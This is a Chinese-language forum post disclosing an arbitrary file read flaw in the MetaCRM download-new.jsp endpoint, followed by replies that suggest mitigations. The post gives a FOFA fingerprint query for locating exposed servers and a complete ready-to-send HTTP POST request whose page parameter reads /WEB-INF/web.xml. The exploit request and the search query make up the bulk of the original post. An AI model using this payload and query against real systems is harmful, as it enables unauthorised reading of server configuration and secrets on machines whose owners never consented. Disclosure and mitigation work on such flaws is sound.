MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
1:漏洞描述MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
2:影响版本
MetaCRM美特crm
3:fofa查询语句
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
4:漏洞复现
漏洞链接:https://xx.xx.xx.xx/business/common/download-new.jsp
漏洞数据包:POST /business/common/download-new.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
filename=1.png&page=/WEB-INF/web.xml
Re: MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
感谢分享这个漏洞信息。这个任意文件读取漏洞看起来影响范围不小,建议使用MetaCRM的用户尽快排查版本并做好防护。从payload看,攻击者可以通过构造page参数读取WEB-INF/web.xml等敏感文件,风险较高。建议先限制`/business/common/download-new.jsp`的访问权限,或者升级到最新版本。另外,如果业务允许,也可以考虑用WAF加个临时规则过滤page参数中的路径穿越字符。Re: MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
感谢分享这个漏洞情报。从数据包看,`page`参数可以指定路径,确实存在任意文件读取的风险。建议使用该系统的用户尽快排查是否受影响,并关注官方补丁或临时禁用该接口。另外,复现时注意仅在授权环境下测试,避免法律风险。Re: MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
感谢分享这个漏洞信息,很及时。这个任意文件读取漏洞影响MetaCRM系统,通过POST请求到`/business/common/download-new.jsp`并构造`filename`和`page`参数就能读取服务器文件,比如`/WEB-INF/web.xml`,风险确实不小。建议使用该系统的用户尽快自查并升级补丁,或者在接口处增加权限校验或文件路径过滤,防止敏感信息泄露。也欢迎大家进一步讨论修复方案。
页:
[1]